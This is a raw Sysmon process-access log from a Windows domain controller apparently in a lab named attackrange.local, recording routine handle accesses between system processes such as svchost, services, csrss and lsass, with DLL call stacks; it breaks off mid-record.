13:11:46.017{08A6967A-4286-6000-0A00-000000009A01}844924C:\Windows\system32\services.exe{08A6967A-4312-6000-9A00-000000009A01}4352C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.017{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9A00-000000009A01}4352C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.001{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4312-6000-9A00-000000009A01}4352C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.001{08A6967A-4286-6000-0A00-000000009A01}8441220C:\Windows\system32\services.exe{08A6967A-4312-6000-9A00-000000009A01}4352C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+316d|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.001{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.001{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:46.001{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003223Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003222Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003221Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003220Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.272{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003219Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.257{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003218Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.257{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003217Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:48.257{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4312-6000-9D00-000000009A01}4296C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-4318-6000-9E00-000000009A01}3456C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:11:52.626{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4318-6000-9E00-000000009A01}3456C:\Program 